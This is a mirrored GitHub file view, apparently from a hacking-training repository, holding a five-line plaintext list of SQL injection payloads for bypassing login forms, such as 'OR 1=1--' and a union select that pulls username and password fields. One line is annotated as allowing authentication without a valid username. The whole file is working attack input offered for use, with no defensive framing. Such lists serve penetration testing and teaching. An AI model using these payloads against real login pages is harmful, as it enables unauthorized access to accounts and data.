mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-10-01 01:25:43 -04:00
6 lines
165 B
Plaintext
6 lines
165 B
Plaintext
|
<username>' OR 1=1--
|
||
|
'OR '' = ' Allows authentication without a valid username.
|
||
|
<username>'--
|
||
|
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||
|
'OR 1=1--
|